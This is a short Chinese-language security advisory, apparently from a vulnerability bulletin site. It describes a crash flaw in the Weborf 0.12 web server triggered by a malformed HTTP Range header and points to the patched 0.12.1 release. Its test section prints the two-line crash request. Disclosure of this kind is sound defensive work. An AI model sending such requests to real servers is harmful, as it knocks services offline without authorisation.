发布日期：2010-06-04
更新日期：2010-06-07

受影响系统：

Galileo Students Team Weborf 0.12

不受影响系统：

Galileo Students Team Weborf 0.12.1

描述：

---

BUGTRAQ  ID: 40575

Weborf是用C编写的轻型Web服务器。

远程用户可以通过向Weborf服务器发送包含有特制Range头的HTTP请求导致服务器终止。

<*来源：Galileo Students Team
  
  链接：http://galileo.dmi.unict.it/wiki/weborf/doku.php?id=news:released_0.12.1
        http://secunia.com/advisories/40051/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /index.html HTTP/0.9
Range: 1-2

建议：

---

厂商补丁：

Galileo Students Team
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://galileo.dmi.unict.it/wiki/weborf/doku.php?id=download

浏览次数：2036
严重程度：0（网友投票）